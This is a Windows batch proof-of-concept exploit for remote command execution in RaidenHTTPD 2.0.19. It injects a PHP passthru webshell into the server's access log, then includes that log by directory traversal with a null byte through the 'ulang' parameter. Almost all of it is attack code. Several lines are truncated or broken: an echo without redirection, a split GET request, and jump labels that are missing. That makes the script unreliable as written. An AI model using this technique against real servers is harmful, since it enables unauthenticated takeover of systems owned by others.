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RaidenHTTPD 2.0.19 ulang cmd exec poc exploit

rem raidenhttpdudo.cmd

                  @echo off

                  color 0a

rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit 
rem WebAdmin one - not enabled by default anymore 
rem however works regardless of  php.ini, because 
rem "ulang" comes from $_GET[] and some magic_quo
rem tes_gpc disable code,lame  divertissement one
rem to demonstrate an  unauthenticated  directory 
rem traversal  ...
rem rgod ----------http://violentcop.splinder.com

         if {%1}=={} goto kill

echo HEAD /?^<?ob_end_clean();ob_clean();passthru($_GET[CMD]);die;?^> 
echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
nc %1 80 -v -w1< in > nul
echo ..\..\..\logs\access_%date:~6,4%-%date:~3,2%-%date:~0,2%.log%%00> puf & 
set /p exploit=< puf 
echo GET 
 HTTP/1.1> in
echo Host: %1>>in & echo Connection: Close>>in & echo.>>in
echo please wait ...
nc %1 80 -v -w1< in > nul
ping localhost -n 15>nul & rem delaying ...
del puf
del in
                telnet %1 23

                goto nowhere

            echo %0 [target-host]


original url: http://retrogod.altervista.org/rgod_raidenhttpdudo.html